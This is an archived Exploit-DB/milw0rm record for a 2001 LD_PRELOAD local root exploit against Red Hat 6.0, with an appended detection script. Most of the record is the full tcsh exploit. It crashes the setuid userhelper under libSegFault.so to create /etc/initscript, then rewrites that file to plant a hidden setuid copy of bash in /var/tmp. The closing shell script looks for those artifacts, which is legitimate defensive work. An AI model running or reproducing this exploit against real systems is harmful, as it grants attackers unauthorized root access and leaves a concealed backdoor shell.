Vendor: Unknown
By: milw0rm.com
CVSS: N/A
Title: LD_PRELOAD exploit
CWE: Unknown
Product Name: Unknown
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Red Hat 6.0
Year: 2001

LD_PRELOAD Exploit in initscript

This exploit abuses the handling of the LD_PRELOAD environment variable to execute arbitrary code. It targets the initscript file on Red Hat 6.0 and potentially other systems: it first gets the setuid program userhelper to create a file called /etc/initscript, then overwrites that file with commands that copy /bin/bash to /var/tmp/.nothing, set the setuid bit on /var/tmp/.nothing, and remove /etc/initscript.

Mitigation:

Unknown

Exploit-DB raw data:

#!/bin/tcsh
# example of exploiting the hole in LD_PRELOAD
# shadow (tested on redhat 6.0, should work on others)

if ( -e /etc/initscript ) echo uwaga: /etc/initscript istnieje
cd /lib
umask 0
setenv LD_PRELOAD libSegFault.so
setenv SEGFAULT_OUTPUT_NAME /etc/initscript
echo czekaj... to moze chwile potrwac...
while (! -e /etc/initscript )
  ( userhelper >& /dev/null & ; killall -11 userhelper >& /dev/null ) > /dev/null
end

echo utworzylem plik initscript

cat > /etc/initscript << _init_
cp /bin/bash /var/tmp/.nothing
chmod 6755 /var/tmp/.nothing
rm /etc/initscript
_init_

echo i nawet go podmienilem

# milw0rm.com [2001-03-04]
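A defender-side check for the two artifacts the listing above describes (a planted /etc/initscript and a setuid copy of /bin/bash under /var/tmp), added here as an example; it is not part of the milw0rm script or the Exploit-DB record. Paths are parameters so the check can be exercised against a scratch tree; the "Register dump"/"Backtrace" strings are what glibc's libSegFault writes into its output file, and the reference binary defaults to /bin/bash.

```shell
#!/bin/sh
# find_setuid_shell_copies DIR [REFERENCE]
# Print regular files under DIR that carry the setuid bit and are
# byte-identical to REFERENCE (default /bin/bash). Returns 0 if any
# were found, 1 otherwise. -exec cmp is used as a find predicate so
# only identical files reach -print.
find_setuid_shell_copies() {
    dir="$1"
    ref="${2:-/bin/bash}"
    matches=$(find "$dir" -type f -perm -4000 \
                   -exec cmp -s '{}' "$ref" \; -print 2>/dev/null)
    [ -n "$matches" ] || return 1
    printf '%s\n' "$matches"
}

# initscript_is_suspicious FILE
# A genuine initscript is a short root-owned shell fragment that init
# runs its children through. One produced by the technique above either
# still holds libSegFault's crash dump (it starts with a register dump
# and backtrace) or has been replaced by commands that plant a setuid
# binary in /var/tmp. Returns 0 when either pattern is present.
initscript_is_suspicious() {
    f="$1"
    [ -f "$f" ] || return 1
    grep -Eq 'Register dump|Backtrace|/var/tmp|chmod [0-9]*[2467][0-9]{3}' "$f"
}

# Stand-alone run against the real paths (no output means nothing found).
if [ "${1:-}" = "--audit" ]; then
    find_setuid_shell_copies /var/tmp || echo "no setuid bash copies in /var/tmp"
    if initscript_is_suspicious /etc/initscript; then
        echo "/etc/initscript looks tampered with"
    fi
fi
```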